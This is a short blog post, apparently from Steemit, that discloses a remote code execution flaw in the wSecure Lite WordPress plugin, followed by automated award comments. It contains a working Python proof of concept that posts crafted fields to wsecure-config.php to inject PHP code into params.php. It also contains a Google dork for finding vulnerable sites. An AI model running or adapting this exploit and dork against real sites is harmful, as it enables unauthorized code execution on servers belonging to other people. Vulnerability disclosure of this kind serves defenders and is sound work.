[CRITICAL] Vulnerable RCE in wSecure Lite(Wordpress)

in #vulnerable8 years ago (edited)

This vulnerability allows attackers to access the servers of all sites using version 2.3 of Wsecure or older with disabled "Magic Quotes" and don't require plugin be active. Plugin have more than 12000 downloads and 2000 activate installs.
Vulnerable file is wsecure-config.php. It gets your POST and allows write Executable code to params.php.

PoS on Python:
import requests
data = {'wsecure_action':'update','key':'','publish':'";\n public function __construct() { echo "Hello!"; }\n/','options':'','custom_path':'"/#"'}
site = "http://[wp-site]/wp-content/plugins/wsecure/wsecure-config.php"
res = requests.post(site, data=data)
print res.text

Version: 2.3 or older
Vendor Homepage: http://www.joomlaserviceprovider.com/
Google Dork: inurl: "/wp-content/plugins/wsecure/wsecure-config.php"

Sort:  

Congratulations @soft! You have received a personal award!

2 Years on Steemit
Click on the badge to view your Board of Honor.

Do you like SteemitBoard's project? Then Vote for its witness and get one more award!

Congratulations @soft! You received a personal award!

Happy Birthday! - You are on the Steem blockchain for 3 years!

You can view your badges on your Steem Board and compare to others on the Steem Ranking

Vote for @Steemitboard as a witness to get one more award and increased upvotes!